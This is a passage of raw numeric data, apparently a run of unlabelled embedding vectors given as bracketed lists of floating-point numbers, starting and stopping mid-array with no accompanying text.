-0.03511403,0.062685795,0.017901056,0.004581844,0.033928826,-0.003198035,-0.023274781,-0.0037095149,0.020975713,0.026131682,0.08052753,0.028136624,-0.0052358843,0.017312804,-0.017014721,0.023488274,-0.024622742,-0.012014069,0.0223586,-0.008141767,-0.0034214891,-0.015134931,0.0440866,-0.024265245,-0.050700624,-0.034983262,0.039084636,-0.008650946,-0.0050314358,-0.103071176,0.041331243,-0.017443633,0.015580921,-0.012003694,-0.042537976,-0.013554283,-0.017223202,0.011326011,0.023881134,0.0015266343,-0.015600849,0.009571279,-0.005165891,-0.03223489,0.012527821,-0.0034073284,-0.014055398,-0.003998595,-0.02260501,-0.021547813,0.03688472,-0.032185648,0.07944713,-0.048075236,-0.049113408,0.058154695,-0.026499104,-0.010803441,0.023141453,-0.018182598,-0.022652594,0.03499736,-0.019956065,0.022200724,0.0001228842,-0.014886076,-0.03683864,-0.006899167,-0.009868453,0.03758158,-0.0064153457,-0.015345252,-0.012654119,0.009367896,0.03521,0.03382355,-0.004893079,0.022195166,0.037215807,0.035210807,0.017650452,-0.02812614,-0.046306692,0.06905296,-0.009545383,0.03323085,0.028712092,0.022367245,0.011915781,-0.0024661347,0.043836564,0.017352529,0.021555629,0.032452345,-0.07930124,-0.07009588,-0.04481763,0.023663225,0.06837341,0.006866909,-0.020264912,-0.059618253,0.046988808,0.021214409,0.026106263,0.03006048,0.014561392,0.122402616,-0.040664494,0.0022983504,-0.009083979,0.01902167,0.017713914,0.002500047,0.024481261,-0.05880293,-0.009649222,0.0038730616,-0.038336337,0.019441603,-0.06557334,0.04885375,0.020845303,-0.06687176,0.0082667675,-0.013715747,-0.036483984,-0.0056752795,0.036312837,-0.020860098,-0.038797267,0.056005403,0.0625933,0.01828333,-0.025207905,-0.011518664,-0.047245566,-0.02447788,0.04404156,-0.013423036,-0.04683637,-0.022489639,0.010596431,0.011655022,-0.016579162,0.054093514,0.0185841,-0.061156787,-0.014783208,-0.035883904,0.030386439,0.023332167,-0.02342253,0.023943067,0.04932197,-0.021717092,0.012926795,0.008276624,-0.0005344251,0.062214382,-0.015599076,-0.0632416,0.03611386,0.028824126,0.030729959,0.037668,0.043381035,0.07584198,-0.045188837,0.01035086,0.01970177,-0.03454522,0.0102193225,-0.01350677,-0.045358904,-0.06511051,-0.0045349966,-0.060621224,0.05019884,0.03586074,-0.052500825,0.037158232,0.0033007057,0.019389905,0.037592854,-0.06591225,-0.026823271,0.00494701,-0.032034777,-0.061634287,0.03406319,0.031053152,0.05293439,-0.022175873,0.06914931,0.05816221,-0.019649345,0.06398987,-0.037541803,-0.011942591,-0.0005453732,0.046019703,-0.10293427,-0.0024480636,-0.06479893,0.015951684,-0.010483108,-0.010792739,-0.03180275,-0.016322907,-0.046959277,-0.03516992,-0.057804015,-0.026089933,0.017101131,0.07628225,0.0031515479,0.010793747,-0.041673902,-0.011590203,-0.04443614,0.0090055205,0.022678563,0.00076089514,-0.063313656,-0.01207063,-0.029494189,-0.0033750501,0.0070569096,-0.0037315392,0.009197798,-0.041273117,-0.06978803,0.036172327,-0.044229016,0.05643714,0.01166178,-0.020749964,-0.027756197,-0.05953184,0.0065513127,-0.0019483449,-0.027981155,-0.026133344,-0.009957189,0.0045833294,-0.012532139,-0.00790874,0.009235264,0.012279027,-0.011112889,-0.04656667,-0.06461073,-0.019596508,0.029451974,0.039441038,-0.02545395,0.045221496,0.06870228,0.024546921,0.04082243,0.014652484,-0.027862962,0.04190838,0.037062988,-0.020300558,0.009882982,0.0033733316,-0.0020724935,0.03960337,0.002589276,0.0070393174,-0.037414018,-0.0355897,-0.05217486,0.094358526,-0.047196753,0.0118670575,-0.029265396,-0.014732528,-0.019184012,-0.009633307,0.04249374,-0.043751445,0.038682185,-0.016308958,0.01432948,-0.05025904,-0.0010984194,-0.025293956,0.05183947,-0.0050710426,0.020904219,0.07947106,-0.013723605,0.006003086,0.019944418,0.026861342,-0.0013469905,0.011069299,0.07815132,0.05566914,0.0041617714,0.052025262,0.064055525,0.030505078,-0.019943897,-0.008884312,0.024641477,0.04702329,-0.02734962,0.044373218,-0.01595967,0.0040721893,-0.03172122,0.0025584816,-0.024968795,0.01001367,0.014131732,0.012705118,0.01638231,-0.041212577,-0.028715847,0.048794985,-0.0022864453,0.012842182,-0.03332631,0.019568617,0.013090001,0.04282095,0.008081579,-0.0060615805,0.016384523,0.0028565614,0.033106096,0.02396409,-0.06253575,-0.004995618,-0.045557342,-0.008402426,0.014356882,-0.04641026,-0.045261588,-0.008107895,-0.04473726,0.00036052035,-0.023514329,0.024715438,0.0034070704,0.014139236,-0.02987906,0.009337948,0.10152169,0.0010298381,-0.019931627,0.0026266312,0.048398778,-0.010059442,0.0072527756,0.034106575,-0.033112403,-0.0014566167,-0.029271308,-0.032679,0.022319451,-0.0025764776,0.036689997,0.036771175,0.004233617,-0.022520205,-0.04687692,-0.022487074,0.031496454,0.040536806,-0.021338541,-0.058235798,-0.0026960566,0.021061515,0.030028205,0.067005135,-0.06006966,-0.014214413,-0.04219791,-0.004258299,-0.018511731,-0.021670477,0.075872585,-0.019735515,0.07331731,-0.01170589,0.026492096,-0.0536091,-0.02321584,-0.02144165,0.023646919,-0.016155096,0.00060729036,-0.026479479,-0.04268169,-0.008339668,0.059793483,-0.017516576,-0.029886397,0.005782413,-0.040496696,-0.03876257,0.032257847,-0.04390867,-0.012543223,0.033332113,0.03643037,0.11297419,0.016234268,0.015221131,-0.018334571,0.08379509,-0.011904563,-0.085737,-0.0099330675,-0.036969073,-0.033347316],[0.007464839,0.079617105,-0.14459592,-0.06787108,0.07973412,-0.041122127,0.046427257,0.02530742,-0.02926943,0.011996334,-0.014443307,0.034417767,0.124346815,-0.008834971,-0.0083838785,-0.053066622,0.0012122334,-0.048323434,-0.03127821,0.053461637,0.005541878,-0.064143434,0.0128112575,-0.043843172,0.06479932,0.07614385,-0.019009171,-0.0049604974,-0.02593581,0.022011694,0.02982581,-0.038583685,-0.08636234,-0.0015175347,-0.05781643,-0.033228185,0.060553282,0.0010727913,-0.024148963,0.021274598,0.06949985,0.033397105,0.0025199049,-0.014652413,-0.02703847,0.0022504108,0.012899164,-0.033059902,0.08459181,-0.05749114,0.007954657,0.0049487706,-0.00014293341,0.03181801,0.054221503,0.03300763,-0.036888488,-0.022539638,0.007126051,-0.037247486,0.10465793,0.034942854,-0.061737712,0.05500237,0.035601992,-0.042835567,-0.023707258,0.014373944,0.055964164,-0.013808439,0.0061354646,0.0040622856,0.00872863,0.03801045,-0.058611937,-0.042499166,-0.050256647,-0.016119437,-0.010466772,0.045239765,0.016030865,0.0032734883,0.1096345,0.011300852,0.016841367,-0.029821841,-0.06592994,-0.009188877,-0.062205713,0.068157665,0.003786116,0.020365039,0.000105690415,0.007052449,-0.044901896,0.02339712,0.018685583,0.024637513,-0.052038368,-0.015900863,-0.035557523,0.018884545,-0.0021417616,-0.0029454592,0.025015166,0.04875411,-0.013042354,0.008078115,-0.033599358,0.0037802039,-0.017033193,0.023461869,-0.03965076,-0.017584624,-0.02216636,-0.006667872,0.04529918,-0.006566857,-0.026357234,0.07375549,0.028378803,-0.015451271,-0.0009717921,0.03737231,-0.022874588,0.018324949,-0.020301936,0.041727822,-0.017353602,-0.045516543,0.004836257,-0.017398417,-0.014652395,-0.019425856,0.025124978,0.08622763,-0.07515861,-0.029108532,0.007053276,-0.00005467529,0.026809363,0.024883388,-0.00066175143,0.0011441247,-0.03449372,-0.051812686,0.010231732,-0.02532383,-0.025348442,-0.0038035128,0.032325193,0.015761657,-0.02748531,-0.011663833,0.009543729,-0.006975778,0.0029555373,0.00814292,-0.035495162,0.047499966,0.01887066,-0.0051668785,-0.0133299455,0.05618735,-0.015775388,-0.03580725,-0.015807338,0.00028125933,-0.0049564024,0.052394453,-0.08710146,-0.0016751688,0.018497597,-0.01572399,0.01784585,-0.0030277148,0.07679046,0.0024718514,0.02787347,-0.0077647003,0.02489342,-0.064398825,0.05765443,0.030408265,-0.012037079,-0.063879386,0.0064071673,0.0008467651,0.046882864,-0.016139802,0.03982724,0.00065500854,-0.05877705,-0.023326155,-0.06878111,-0.0044364776,0.037217326,-0.023156296,0.017474422,-0.03109576,-0.02932054,-0.008110215,-0.06297292,0.0030095493,-0.055892706,0.050029136,0.039393622,0.05542529,-0.04811189,0.04212918,0.062086146,-0.020269595,0.007236169,0.024763752,-0.011841041,-0.023154056,-0.024763385,-0.0316184,-0.010641236,-0.0011630553,0.0092416825,-0.014318189,-0.022817219,0.0025310165,0.015059598,0.014022002,-0.04241286,0.01512623,-0.013485661,-0.0071607213,0.002440363,-0.06745524,0.056583777,0.0065188254,0.009416727,0.024557283,-0.019466078,0.05287584,-0.036465317,0.05709071,0.018403612,0.04504799,0.0048104227,-0.02477383,-0.030962756,-0.044875257,0.030991236,-0.008420935,-0.02520332,0.07184886,-0.006343682,0.008718137,0.026799988,0.034494027,0.051676888,-0.034794066,-0.0006699021,-0.0028772585,0.00034510886,0.020118315,0.062304884,-0.028622938,0.01494636,-0.058799513,-0.0139032705,-0.030989094,-0.04837154,-0.019148732,0.034140747,0.049572423,0.04537731,0.046739947,0.0037581967,0.02125535,-0.0012124142,0.055344135,0.004671693,-0.019018617,-0.0179973,0.0073297727,-0.04730584,-0.0112144025,-0.016594395,0.00007230935,0.0002493752,0.018712198,-0.027975453,-0.0013188868,0.031315565,-0.0081774555,0.011401423,-0.040326867,-0.05839307,0.018778263,0.016448785,0.04044215,0.03020544,-0.017423721,0.0153431995,-0.05292774,0.014504405,0.013489695,0.06650435,0.050134603,0.005908379,-0.009867171,-0.017512867,0.009093352,0.022684582,-0.04711244,-0.0674364,0.0015479706,0.0011374275,-0.021573344,0.006092064,0.016924856,0.04261171,0.020197326,0.024726594,-0.00013014334,0.05129373,-0.028840045,0.013980651,-0.0634989,-0.019664893,0.037500992,-0.022412285,-0.00060477364,-0.026232371,0.010141318,0.026943505,0.02799891,0.045513906,-0.039487977,-0.025397647,0.040945403,0.030784406,-0.0035748074,0.025037965,0.0061475094,0.026205726,0.022283496,-0.00061656645,-0.040859,0.009190893,0.011421885,-0.0214585,-0.031138893,0.03573445,0.03344502,-0.0000748969,0.017591566,-0.006801643,-0.06679302,0.055993628,0.021795422,0.044587027,0.055098582,0.039754715,-0.037394635,0.05037915,-0.0060833306,0.03677545,-0.004368818,0.005984006,0.023602057,0.032095287,-0.011172602,0.0013817953,0.010374885,-0.0030941314,-0.029584529,-0.024012772,0.06577937,-0.01632886,0.000017628316,-0.091773495,0.008773573,0.0041551883,-0.022632983,0.022679929,-0.012812077,-0.013073697,0.007949468,0.009517123,-0.01484312,-0.004664111,-0.07061202,0.013548197,-0.0338053,-0.014869815,0.0017331102,-0.040804755,-0.009725613,0.01545954,-0.042590342,0.011422818,0.012071966,0.015690114,0.053099204,-0.043549716,-0.058501504,0.027004205,0.034921296,-0.011842213,-0.0005994099,-0.04190021,-0.018991249,0.039913807,-0.0016855214,0.015025052,0.034701634,-0.033057615,-0.04846241,0.0120502105,-0.008388046,0.036266394,0.008110656,-0.010309303,-0.011956147,0.022614801,0.031633444,0.029924551,0.01283145,0.022292394,-0.011371529,-0.00080632017,0.023803743,0.002431483,-0.02276242,0.05803705,0.0023961274,0.018648813,0.011321046,0.0006122637,0.01596263,0.025129883,0.04804617,0.029509906,-0.03122468,0.00403253,-0.07688679,-0.029215649,-0.05166862,0.021385675,0.07569735,0.05176161,-0.028361682,-0.08689583,0.071276516,0.02368466,-0.0020364686,0.028417122,0.008463816,0.0891508,-0.019626824,0.020205086,-0.014256617,0.024361411,0.025961256,-0.01204996,0.027420735,-0.06833807,0.037838496,0.037367314,-0.02155734,0.037110567,-0.03945304,0.040366046,0.06403683,-0.038089436,0.0068531437,0.02220754,-0.056763936,-0.0075498587,0.040151056,-0.046461705,0.0020905244,0.00601416,0.048072387,0.026004054,-0.06652348,-0.034704383,-0.039155792,0.0014534366,0.059818324,0.002548905,-0.044529043,-0.021333655,0.040921565,0.011903949,0.03719308,0.021126624,0.0024412326,-0.050854694,-0.044262912,-0.023790114,0.00075620686,0.061407946,0.020332359,0.025015183,0.053927854,-0.01975359,0.008163862,0.0058257957,-0.0038629645,0.056904975,-0.03677537,-0.05435002,0.0069349827,0.0025038593,0.04129797,0.03564084,0.026487531,0.01196119,-0.037619285,0.05014849,0.041692372,-0.08442238,0.0070145912,0.021737635,-0.039390266,-0.020851398,0.04540839,-0.061488546,0.005833193,0.047604054,-0.084127724,0.061132547,-0.015952807,0.011501673,0.009258077,-0.06653842,0.008151733,0.035049815,-0.0041966215,-0.022821117,0.027469793,0.05572723,0.030601112,0.03280209,0.03169443,0.015198349,-0.024339613,0.025680669,-0.030868078,-0.03660238,0.06808687,0.017433288,-0.121386744,0.025776204,-0.074522085,0.027297843,-0.019222165,-0.023293512,-0.018626258,0.01970863,-0.017711826,-0.0083113685,-0.033463314,-0.06812653,-0.02205543,0.059648357,0.026520051,-0.023691894,-0.05413799,-0.022450037,-0.047136385,-0.015580898,0.022651402,0.022576284,-0.068522476,-0.030227544,-0.032099213,-0.016436249,-0.012813154,0.0005113474,0.06577853,-0.04420912,-0.060479116,0.039513964,-0.03337214,0.014657218,-0.0018616926,-0.03967097,-0.03284764,-0.07231409,-0.019277247,0.010308096,-0.00691291,-0.016488831,-0.00832428,0.007207724,0.0069109774,0.0020295323,0.0052506467,0.0061265146,-0.007728739,-0.072151035,-0.061024465,0.006052727,0.014881255,0.05108634,-0.084817596,0.044791225,0.05715784,0.00044893165,0.028338099,-0.0062576244,-0.009646697,0.015343959,0.033384487,0.000457134,-0.0018746143,0.024966836,-0.025443835,0.053027123,-0.008156437,-0.022472473,-0.043830108,-0.0020572706,-0.03181627,0.055243306,-0.03965375,0.008124771,-0.022839583,-0.018227162,-0.031001141,-0.010018737,0.016285315,-0.06723659,0.029336877,-0.02131462,-0.016037542,-0.07883416,0.0031483772,-0.0601914,0.026178615,0.008466248,0.053044595,0.051236574,-0.023855392,-0.027409846,0.021104699,0.037165526,-0.019397901,0.015462156,0.059578024,0.03155915,-0.032252893,0.05582753,0.09893137,0.015041302,-0.020065548,-0.01147185,-0.0062288917,0.038437646,-0.0214699,-0.010136258,-0.00455796,0.009897358,-0.04036247,-0.011101134,0.027246747,-0.004085404,-0.030723136,-0.023460593,0.0000472938,-0.009921394,-0.049828313,0.06248368,0.011965969,0.0102949655,-0.026091086,0.010387633,-0.002924545,0.012219725,-0.012264128,-0.018514471,-0.0007482931,-0.0328073,0.029517606,0.024309365,-0.055219248,0.009732205,-0.067052916,0.0030989107,-0.010539446,-0.025122808,-0.028587945,-0.030046789,0.0011616754,-0.0024633466,-0.037485912,0.023756508,0.02822994,0.005310487,-0.047638107,-0.0091112,0.10921182,0.008453,0.05264483,-0.004943598,0.0060545835,-0.016046016,-0.00856045,0.033771195,-0.0037413684,0.015125631,-0.048556864,-0.038946826,-0.0055009853,-0.042143017,0.027561806,0.051559765,0.051850952,-0.037906278,-0.026164515,-0.04112498,0.02674335,0.040303055,-0.014005929,-0.0753069,-0.023483662,0.041487563,0.025406094,0.09224556,-0.022857528,0.012806534,-0.0139978565,0.0078475,-0.032461245,-0.071686186,0.051310714,-0.004916242,0.019038413,0.0053261453,0.009544815,-0.044202648,-0.038233493,-0.046811678,0.024377672,0.012851222,-0.0141131915,-0.009389834,-0.015291466,-0.041111592,0.030228334,-0.028194351,-0.03837386,0.051707346,-0.03659862,-0.0014491291,-0.011798219,0.0014461044,0.0082009,0.010193459,0.0166574,0.09177992,0.003968285,0.021768205,-0.027716173,0.038541697,0.0017978838,-0.02900731,-0.034586284,-0.02386795,-0.03623832],[0.017650906,0.08462994,-0.17394178,-0.08190485,0.06108372,-0.05340103,0.05665682,0.02182146,-0.014784616,-0.041418537,0.0028878453,0.028728556,0.07030642,-0.034312785,-0.016687917,-0.050604995,-0.023251021,-0.039460376,-0.026786225,0.058808457,-0.025413236,0.009403749,0.01563672,-0.04609815,0.037850983,0.13477826,-0.02263818,-0.01976396,-0.012714781,-0.023578115,0.012851322,-0.028272633,-0.012820838,0.021724341,-0.026204642,0.010370152,0.019019408,0.005731486,0.019610137,-0.000042762513,0.057997763,0.06565105,-0.015754683,-0.040624455,0.017773867,0.01946853,0.021177994,-0.026519218,0.06961601,-0.07318181,-0.0065813307,0.008428873,0.022556974,0.027987579,0.061335705,0.0040435377,-0.049961418,0.033187587,0.02600136,-0.061280064,0.05533143,0.05468753,-0.09733826,0.031060092,-0.0077562146,-0.018498516,-0.041926667,0.05672081,0.008436298,-0.05257772,-0.0027545784,0.024505207,0.013011115,0.043257646,-0.081599966,0.022629905,-0.003919266,0.014202255,-0.024722274,0.036811836,0.024339488,0.018474322,0.054004285,0.028756347,0.0408122,-0.044156194,-0.017913908,0.028253362,-0.013626719,0.0804453,0.037936535,-0.015620884,-0.0015645896,0.004158668,-0.06288354,0.037432555,0.0018093409,0.027237236,-0.05303299,-0.05105115,-0.021612275,-0.002037529,0.029477585,0.020068679,0.021577017,0.036996234,0.011410129,0.043385327,-0.066981986,0.008730044,-0.024582403,0.032719504,-0.014883246,-0.020376261,-0.07923937,-0.017060785,0.033699036,-0.041805506,-0.07538692,0.02929458,-0.026091725,-0.015588548,0.0073987753,0.02869335,-0.034651686,-0.03399354,-0.03774873,0.029682899,-0.016248316,-0.043144755,0.017758649,-0.03792953,-0.045305006,-0.010084452,0.0106416065,0.044554044,-0.025790654,-0.008417242,0.020998482,0.033380274,0.008458985,0.016113382,-0.0007238596,-0.04371487,0.0010971727,-0.049962085,0.036254786,-0.031074757,-0.0686366,0.026553,0.06513313,0.03124002,-0.008572326,0.027776655,0.0036230513,-0.017040458,0.017813612,0.010060658,-0.0121143665,0.024938062,-0.0057953354,0.017804822,-0.035844114,0.050314613,0.031764276,-0.05670441,-0.0029883247,0.008199346,-0.0014641975,0.06289737,-0.077199705,-0.012024074,0.0047412873,0.00033593216,0.040736537,-0.022441544,0.055197347,-0.08065552,0.023879211,-0.015528377,0.014263699,-0.03565225,0.035811193,0.02045433,-0.020800238,-0.004368343,0.002242092,-0.0062164604,0.012924613,-0.019224416,0.022276307,-0.0053402525,-0.06013379,-0.011168405,-0.03690815,-0.047915854,0.035495546,0.0035564865,0.002518151,-0.041332718,-0.028957414,-0.0020871563,-0.06937936,-0.0006624552,-0.039294373,0.065223746,-0.019451763,0.03852726,-0.01982362,0.0040048067,0.029075414,-0.012727305,-0.013240087,0.038340632,-0.01668885,-0.0067960694,-0.012329373,-0.05186341,-0.02169196,0.008715898,0.013427394,-0.010720207,0.0040611443,-0.0043853293,0.03702005,0.0052917325,-0.058195192,-0.001733215,0.044511963,-0.026490865,-0.0040809405,-0.044320382,0.031940762,-0.055659745,0.015745642,0.034347802,0.013957615,0.020771584,-0.026645824,0.015618562,0.013431278,0.055352535,-0.017748808,0.0011398777,0.006886516,-0.045443512,-0.017922569,-0.02759733,0.039272718,0.059786804,0.0015378307,-0.031490248,0.024262676,0.050204046,0.0073393197,-0.05946056,-0.015032384,-0.01291084,0.021009915,0.01565276,0.018694226,-0.013862759,0.011436346,-0.035269465,-0.012034974,-0.038189627,0.02002558,-0.019981315,-0.0018046661,0.017000671,0.052021455,0.0012969475,0.012024332,0.037155055,-0.033105247,0.039059322,-0.026515607,-0.0062764194,-0.055965286,0.009919237,-0.015001389,-0.019841468,-0.0087183425,-0.01925759,0.008709578,0.025434306,0.0014982537,-0.050813112,0.0072453725,0.030418761,0.008508626,-0.011575496,0.003801484,0.029753298,-0.007731294,0.01626255,0.01578285,-0.023521977,0.016208734,-0.07210258,0.009421404,0.033569586,0.085443854,0.0420889,0.013312747,-0.02122105,-0.0046982244,-0.009446844,0.0037335446,-0.012968765,-0.05307602,-0.0052810875,-0.0053285165,0.021060834,-0.045823514,0.030406412,0.08058312,-0.006881777,0.02484974,-0.015163755,0.041681565,-0.08543871,0.024091724,-0.06840814,0.016462421,0.103000544,-0.021142334,0.053301267,-0.046298116,0.00040317414,0.051037982,0.009744936,0.015845189,-0.015704079,-0.06168908,0.066594474,0.01801595,-0.014542134,0.044477906,0.013178543,0.02147173,0.024911588,0.03371204,-0.031752296,-0.00026026473,0.029944478,-0.033938672,-0.010819476,0.06306157,0.033427622,-0.031432625,0.009538249,0.010127186,-0.020434497,0.009004535,0.03668772,0.02754676,0.03236034,-0.0044119656,-0.022255529,0.06562519,-0.015935035,0.05207287,-0.0033052505,-0.03600174,0.020176806,0.04625899,-0.012940304,-0.002413108,-0.01023184,0.0012802999,0.0023673251,-0.030386806,0.011188348,-0.008608979,-0.019808803,-0.07980022,0.013027916,0.00086857734,-0.015466026,0.087915726,0.007767938,-0.02402211,0.004069958,0.0018991232,-0.04336858,-0.0002577079,-0.007930969,-0.03840859,-0.016394764,-0.05016718,-0.027905345,-0.045467522,0.01950575,0.023779958,-0.05525268,0.018883273,0.010227416,-0.010696411,0.0842746,-0.05798847,-0.06307272,0.01541747,-0.033926483,-0.0040517068,0.022348072,-0.068208,-0.030622069,0.014459276,-0.008568366,0.011639747,0.06949514,-0.0052018226,-0.03378592,0.049988892,0.0119901,0.045261346,-0.0049645207,-0.0022853124,-0.01669305,0.04862302,0.04550032,0.016426476,0.013715819,0.037844732,0.025109803,0.029804647,0.040345002,0.017669529,-0.017071005,0.07678642,0.02221684,0.021954933,-0.010302323,-0.016971536,0.010075295,0.051293608,0.01093371,-0.039120615,-0.007895405,0.02049971,-0.05397471,-0.02702378,-0.051556785,0.024426313,0.056304846,0.019668814,-0.04852394,-0.06757422,0.073140316,0.063551016,0.00965658,-0.004702836,-0.0012717312,0.08439434,-0.015860368,-0.010982326,0.016059542,0.049700726,0.042409245,-0.004014574,0.011088395,-0.048325337,-0.018663444,0.035218377,-0.008210523,-0.026001433,-0.0046944385,0.030840358,0.05942234,-0.07452425,-0.0045535825,-0.013116347,-0.09370199,0.0027368222,0.038917795,-0.02898793,-0.018755635,0.010764709,0.049136218,0.027780555,-0.04480639,-0.027124634,-0.023683954,0.00501252,0.028194042,0.0038040392,-0.047647774,-0.028567908,0.018359274,0.024536053,0.0076547414,0.05140549,-0.021079712,-0.01409377,0.0006953972,-0.002473007,-0.0079056,0.0043105083,0.016352303,0.032074485,0.07408672,-0.013252524,0.0060411706,0.0021185447,0.00058903254,0.09754342,-0.04669061,-0.015187012,-0.0111580165,0.0019331841,-0.009139164,-0.010112131,0.0035752868,0.031535175,-0.065736316,0.009897754,0.0069723064,-0.045469135,-0.031270087,-0.02884791,-0.06360926,-0.0006562763,0.022567678,-0.036586612,0.024395606,0.0035645042,-0.04790015,-0.00060604134,-0.008163313,0.0215461,0.04583479,-0.05918215,-0.02063029,0.05428131,0.01237669,-0.075001426,0.015655579,0.011145702,0.049268577,0.0037027597,0.038474027,0.025211943,-0.031500928,-0.03011589,-0.037618615,0.0029422662,-0.0019745028,0.0191167,-0.09022865,0.036514524,-0.021011587,0.037201647,-0.014970478,0.030642565,-0.029544478,0.008658314,-0.027731901,-0.049766723,-0.047049746,-0.03665901,0.025151074,0.06625366,0.0080757635,0.00739549,-0.018606486,0.008048577,-0.0318885,-0.013525852,0.018757079,0.052995265,-0.06846916,-0.02471112,-0.034877494,0.02294146,0.01982245,0.014013933,-0.009982981,-0.052353475,-0.06997657,0.05772586,-0.021322388,0.034061346,0.033820543,-0.062340412,0.026568566,-0.040700473,-0.0323804,-0.014402795,-0.037372194,0.02300851,0.04953489,0.060226478,-0.04662212,0.00012374144,-0.0127972085,-0.012284896,0.024886822,-0.055892535,-0.07019192,0.03109957,-0.0066059493,0.07872842,-0.04171052,0.036476064,0.0442236,-0.009135066,-0.009640191,-0.007054235,-0.019220324,0.042153616,0.009127115,-0.04097033,-0.015118519,0.0018205344,-0.07849249,0.0727219,-0.010252311,0.005195046,-0.038059313,-0.019054491,-0.08979223,-0.001519911,-0.050923564,0.00041239944,0.005068199,-0.019828845,-0.04665344,0.007267983,0.020053135,-0.005948878,0.06242539,-0.013862682,-0.020360596,-0.1030217,0.012972308,-0.035911772,0.04184603,0.020042848,0.006268864,0.051303152,-0.03162645,0.015958432,0.041856427,0.099492356,0.019155335,0.0038309395,0.06797708,0.039637893,-0.037296746,0.048027307,0.06228394,0.006042475,0.026289262,-0.035869364,-0.012842241,0.034744877,-0.034834146,-0.01176298,-0.0015248439,-0.012218803,0.041587155,-0.0061674155,-0.022494102,-0.009378428,0.008388631,0.0075882375,-0.017018337,-0.012557217,-0.015031378,0.068619005,0.024079017,0.000061005336,-0.017563656,0.0306516,0.017634917,0.035922963,0.021807622,-0.007459251,0.0050176685,0.012305158,0.041440304,0.015298908,-0.036542777,-0.008838528,-0.00533882,0.01036132,-0.035517644,-0.015444586,-0.034317173,-0.052300476,-0.041945122,-0.03441404,-0.057486925,-0.010716711,0.013742405,-0.01254117,-0.025165323,-0.0098465895,0.07663708,-0.025914969,0.004683838,-0.0069556204,0.007465469,0.035900753,0.030624079,0.019520056,-0.033559,0.023126235,-0.0487433,0.0047397525,0.007964307,0.002636248,0.018980108,0.03770132,0.032376233,-0.052852973,-0.025202628,0.0022220118,0.031167941,0.022348681,-0.028973866,-0.027321883,0.02015627,0.012903295,0.032517515,0.041071374,-0.04386681,-0.009020944,-0.010286335,-0.025134785,-0.036378633,-0.04731434,0.02561592,0.0049839546,0.03441792,-0.014520592,-0.018178167,-0.042887226,-0.025622632,-0.039651737,0.044210743,-0.033870976,0.014368188,-0.0303473,0.008617854,-0.017278213,0.03203774,0.015908474,-0.057050012,0.0033327364,-0.014052795,-0.0028675427,0.032710753,-0.0012780281,0.008760796,0.029157221,0.05390147,0.100282066,0.042060502,-0.016847095,-0.020608041,0.061251257,0.007961786,-0.040280484,0.021452758,-0.03979297,0.008262068],[0.009010006,0.03753295,-0.17851098,-0.046881314,0.04820014,0.004304088,0.016978905,0.056685165,-0.07463055,0.00092160207,-0.009967085,0.03213838,0.08352887,0.009766029,-0.013331717,-0.0014779856,0.013495812,-0.032997187,-0.047117714,0.053827874,0.026635358,-0.03415684,0.00720638,-0.06678864,0.067329556,0.06616175,-0.012344462,0.021994105,-0.031737346,-0.006513699,-0.009858209,-0.0044277566,-0.004799188,0.016878402,-0.082942806,-0.050090563,0.020135261,0.007066446,0.034008987,0.020021927,0.07446517,0.01418877,-0.0125811845,-0.05372906,-0.008247403,0.005216376,0.053038012,0.007676053,0.05305438,-0.06972791,0.011487476,-0.008481927,0.007949509,0.008376668,0.105622545,0.039110534,-0.025755176,0.0007131211,0.012123006,-0.062169656,0.06667873,0.053895507,-0.06886635,0.02699423,0.010403149,-0.023853568,-0.053780828,0.0568195,0.019175882,-0.0022852272,0.05509603,0.02872103,0.0010247552,0.08218685,-0.052471902,-0.06284711,-0.02233523,-0.0014264748,-0.010257555,0.030370273,0.0001504994,0.00892027,0.072821386,-0.0058235684,0.0402371,-0.039421808,-0.022917144,0.0035851866,-0.06657123,0.052140176,0.0120868115,-0.007266732,0.026612185,-0.025571961,-0.057494614,0.004411095,-0.011492569,0.04285711,-0.013287784,-0.0027149452,-0.035447188,-0.015110841,0.01826255,-0.0053547863,-0.0005191415,0.035652924,0.046167742,0.0006268033,-0.040066905,-0.012377724,0.004478699,0.0736464,-0.007490869,-0.031404328,-0.023240523,-0.022676764,0.012009741,-0.045831583,-0.005124033,0.033228695,-0.019622633,-0.026570834,-0.062541835,0.06855283,0.0044239205,-0.0064694025,-0.05460785,0.05525497,-0.004858056,-0.038263034,-0.013583451,-0.018833145,-0.030349024,-0.02248231,-0.00037551828,0.029585475,0.0031035787,-0.03612286,0.024119588,0.015777173,0.030712547,0.009914959,-0.018751446,-0.05102451,0.043024216,-0.06365266,-0.000926989,-0.020856475,-0.0733049,0.0042783916,0.03677608,-0.004242722,-0.0147455605,0.0035493532,0.0247811,0.015141164,-0.0061144033,0.023085298,0.03299943,0.015305895,0.048441853,-0.04292828,-0.08034749,0.080448076,0.009367051,-0.042039443,-0.02073812,0.024894448,-0.0076323724,0.026373997,-0.061301764,-0.009858389,0.00066997507,-0.020471066,0.005436984,0.027166497,0.04654809,-0.065501444,0.04080079,-0.025043206,0.030197855,-0.022301527,0.037309606,-0.00018570219,-0.011460219,-0.011000091,-0.013704158,-0.06564124,-0.014550045,-0.015464028,0.009939184,0.0052944394,-0.059554912,-0.039957825,-0.020469114,-0.04124903,0.031612758,0.0023859823,0.015220636,-0.0056907414,-0.06327085,-0.011349909,-0.063743375,-0.031915266,-0.038649596,0.038291898,0.018314756,-0.0029028372,-0.06924789,0.01040055,0.078875154,0.006714016,0.04520125,0.0124824755,0.011744394,-0.015039361,-0.014851305,-0.02928758,-0.026347147,-0.035757862,-0.009467517,-0.00961759,0.0015636407,0.009433297,0.03500315,-0.012050977,-0.023443447,-0.009235427,-0.024555482,-0.0070596845,-0.0022752117,-0.065773495,0.017120222,-0.026893718,0.006964862,0.043071855,-0.028686585,0.04989483,0.006165488,-0.012523614,0.010522922,0.06641886,-0.050728597,0.027750373,-0.039731756,-0.0048377053,0.011718715,-0.016080197,0.013369339,0.066084474,-0.009601047,0.009738325,0.026489453,0.022371836,0.052643094,-0.03781335,-0.018019734,-0.009732601,0.045715053,0.01658852,0.004337095,0.0015235549,-0.009192277,-0.03944679,-0.013615732,-0.031763397,0.01475217,-0.008932999,-0.009926711,0.021540392,0.029901713,0.013239918,0.04371374,0.042948775,0.0014033974,0.022922428,-0.028130105,-0.0065829568,-0.02044549,-0.011901768,-0.0058431868,-0.015955934,0.01424652,0.028733326,0.013617258,-0.013249231,-0.020900352,-0.0019734039,0.008250593,-0.0006368728,-0.0016771685,-0.043897938,-0.034274325,0.008945309,-0.015991889,0.04296636,0.020790264,0.021761877,0.017218018,-0.06652529,0.027014641,0.029707732,0.05062892,0.029214706,0.0021612414,-0.022988899,0.032916855,